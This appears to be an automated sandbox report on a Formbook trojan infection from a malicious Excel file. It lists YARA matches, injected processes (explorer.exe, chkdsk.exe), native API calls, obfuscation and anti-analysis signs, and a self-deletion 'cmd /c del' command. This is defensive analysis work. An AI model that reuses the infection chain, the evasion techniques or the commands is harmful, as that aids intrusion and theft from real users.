          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1784, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: oktuxvhtsq.exe PID: 1516, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: chkdsk.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030FB
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0201DF5C appears 137 times
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0206373B appears 253 times
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: String function: 0201E2A8 appears 60 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 007AF970 appears 84 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 0078373B appears 253 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 0073E2A8 appears 60 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 004102B0 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 00783F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: String function: 0073DF5C appears 137 times
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A320 NtCreateFile,7_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A3D0 NtReadFile,7_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A450 NtClose,7_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A500 NtAllocateVirtualMemory,7_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A3CA NtReadFile,7_2_0041A3CA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041A44B NtClose,7_2_0041A44B
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00730078 NtResumeThread,LdrInitializeThunk,7_2_00730078
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_00730048
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007300C4 NtCreateFile,LdrInitializeThunk,7_2_007300C4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072F900 NtReadFile,LdrInitializeThunk,7_2_0072F900
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072F9F0 NtClose,LdrInitializeThunk,7_2_0072F9F0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0072FAE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0072FAD0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0072FB68
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0072FBB8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0072FC60
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_0072FC90
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0072FDC0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FD8C NtDelayExecution,LdrInitializeThunk,7_2_0072FD8C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0072FED0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_0072FEA0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FFB4 NtCreateSection,LdrInitializeThunk,7_2_0072FFB4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00730060 NtQuerySection,7_2_00730060
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0073010C NtOpenDirectoryObject,7_2_0073010C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007301D4 NtSetValueKey,7_2_007301D4
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007307AC NtCreateMutant,7_2_007307AC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00730C40 NtGetContextThread,7_2_00730C40
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_007310D0 NtOpenProcessToken,7_2_007310D0
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00731148 NtOpenThread,7_2_00731148
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072F8CC NtWaitForSingleObject,7_2_0072F8CC
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00731930 NtSetContextThread,7_2_00731930
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072F938 NtWriteFile,7_2_0072F938
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FA50 NtEnumerateValueKey,7_2_0072FA50
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FA20 NtQueryInformationFile,7_2_0072FA20
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FAB8 NtQueryValueKey,7_2_0072FAB8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FB50 NtCreateKey,7_2_0072FB50
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FBE8 NtQueryVirtualMemory,7_2_0072FBE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FC48 NtSetInformationFile,7_2_0072FC48
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FC30 NtOpenProcess,7_2_0072FC30
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FD5C NtEnumerateKey,7_2_0072FD5C
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00731D80 NtSuspendThread,7_2_00731D80
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FE24 NtWriteVirtualMemory,7_2_0072FE24
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FF34 NtQueueApcThread,7_2_0072FF34
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0072FFFC NtCreateProcessEx,7_2_0072FFFC
          Source: C:\Windows\explorer.exe | Code function: 8_2_08080E12 NtProtectVirtualMemory,8_2_08080E12
          Source: C:\Windows\explorer.exe | Code function: 8_2_0807F232 NtCreateFile,8_2_0807F232
          Source: C:\Windows\explorer.exe | Code function: 8_2_08080E0A NtProtectVirtualMemory,8_2_08080E0A
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020100C4 NtCreateFile,LdrInitializeThunk,10_2_020100C4
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020107AC NtCreateMutant,LdrInitializeThunk,10_2_020107AC
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk,10_2_0200FAB8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_0200FAD0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk,10_2_0200FAE8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FB50 NtCreateKey,LdrInitializeThunk,10_2_0200FB50
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk,10_2_0200FB68
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk,10_2_0200FBB8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200F900 NtReadFile,LdrInitializeThunk,10_2_0200F900
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200F9F0 NtClose,LdrInitializeThunk,10_2_0200F9F0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_0200FED0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FFB4 NtCreateSection,LdrInitializeThunk,10_2_0200FFB4
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk,10_2_0200FC60
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FD8C NtDelayExecution,LdrInitializeThunk,10_2_0200FD8C
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk,10_2_0200FDC0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02010048 NtProtectVirtualMemory,10_2_02010048
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02010060 NtQuerySection,10_2_02010060
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02010078 NtResumeThread,10_2_02010078
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0201010C NtOpenDirectoryObject,10_2_0201010C
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020101D4 NtSetValueKey,10_2_020101D4
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02010C40 NtGetContextThread,10_2_02010C40
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_020110D0 NtOpenProcessToken,10_2_020110D0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02011148 NtOpenThread,10_2_02011148
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FA20 NtQueryInformationFile,10_2_0200FA20
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FA50 NtEnumerateValueKey,10_2_0200FA50
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FBE8 NtQueryVirtualMemory,10_2_0200FBE8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200F8CC NtWaitForSingleObject,10_2_0200F8CC
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02011930 NtSetContextThread,10_2_02011930
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200F938 NtWriteFile,10_2_0200F938
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FE24 NtWriteVirtualMemory,10_2_0200FE24
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FEA0 NtReadVirtualMemory,10_2_0200FEA0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FF34 NtQueueApcThread,10_2_0200FF34
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FFFC NtCreateProcessEx,10_2_0200FFFC
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FC30 NtOpenProcess,10_2_0200FC30
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FC48 NtSetInformationFile,10_2_0200FC48
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FC90 NtUnmapViewOfSection,10_2_0200FC90
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0200FD5C NtEnumerateKey,10_2_0200FD5C
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_02011D80 NtSuspendThread,10_2_02011D80
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA320 NtCreateFile,10_2_000DA320
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA3D0 NtReadFile,10_2_000DA3D0
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA450 NtClose,10_2_000DA450
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA500 NtAllocateVirtualMemory,10_2_000DA500
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA3CA NtReadFile,10_2_000DA3CA
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DA44B NtClose,10_2_000DA44B
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$RFQ-T56797W_1.xlsx
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@14/7@9/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: RFQ-T56797W_1.xlsx | OLE indicator, Workbook stream: true
          Source: RFQ-T56797W_1.xlsx | ReversingLabs: Detection: 63%
          Source: RFQ-T56797W_1.xlsx | Virustotal: Detection: 54%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe"
          Source: C:\Users\user\AppData\Roaming\word.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR8CB4.tmp
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,5_2_00402053
          Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_00404292
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: RFQ-T56797W_1.xlsx | Static file information: File size 1228030 > 1048576
          Source: Binary string: chkdsk.pdb source: oktuxvhtsq.exe, 00000007.00000002.420661230.0000000000240000.00000040.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420667702.0000000000274000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849693334.00000000005E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oktuxvhtsq.exe, oktuxvhtsq.exe, 00000007.00000003.411866541.0000000000430000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000003.412146879.0000000000590000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000003.420901641.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000003.421285502.0000000001E70000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002180000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb& source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
Source: RFQ-T56797W_1.xlsx | Initial sample: OLE indicators vbamacros = False

          Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Unpacked PE file: 7.2.oktuxvhtsq.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.gfids:R;.tls:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_004102F6 push ecx; ret 6_2_00410309
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 6_2_0040FD0A push ecx; ret 6_2_0040FD1D
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041E211 push cs; iretd 7_2_0041E213
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041D475 push eax; ret 7_2_0041D4C8
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041D4C2 push eax; ret 7_2_0041D4C8
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041D4CB push eax; ret 7_2_0041D532
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0041D52C push eax; ret 7_2_0041D532
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_00418689 pushad ; iretd 7_2_0041868A
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Code function: 7_2_0073DFA1 push ecx; ret 7_2_0073DFB4
Source: C:\Windows\explorer.exe | Code function: 8_2_07D89B1E push esp; retn 0000h 8_2_07D89B1F
Source: C:\Windows\explorer.exe | Code function: 8_2_07D89B02 push esp; retn 0000h 8_2_07D89B03
Source: C:\Windows\explorer.exe | Code function: 8_2_07D899B5 push esp; retn 0000h 8_2_07D89AE7
Source: C:\Windows\explorer.exe | Code function: 8_2_08082B02 push esp; retn 0000h 8_2_08082B03
Source: C:\Windows\explorer.exe | Code function: 8_2_08082B1E push esp; retn 0000h 8_2_08082B1F
Source: C:\Windows\explorer.exe | Code function: 8_2_080829B5 push esp; retn 0000h 8_2_08082AE7
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_0201DFA1 push ecx; ret 10_2_0201DFB4
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DE211 push cs; iretd 10_2_000DE213
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DD475 push eax; ret 10_2_000DD4C8
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DD4CB push eax; ret 10_2_000DD532
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DD4C2 push eax; ret 10_2_000DD4C8
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000DD52C push eax; ret 10_2_000DD532
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_000D8689 pushad ; iretd 10_2_000D868A
Source: C:\Users\user\AppData\Roaming\word.exe | File created: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\word.exe

          Hooking and other Techniques for Hiding and Protection

Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE8
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exeCode function: 6_2_0040F085 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_0040F085
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (9 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Users\user\AppData\Roaming\word.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\SysWOW64\chkdsk.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
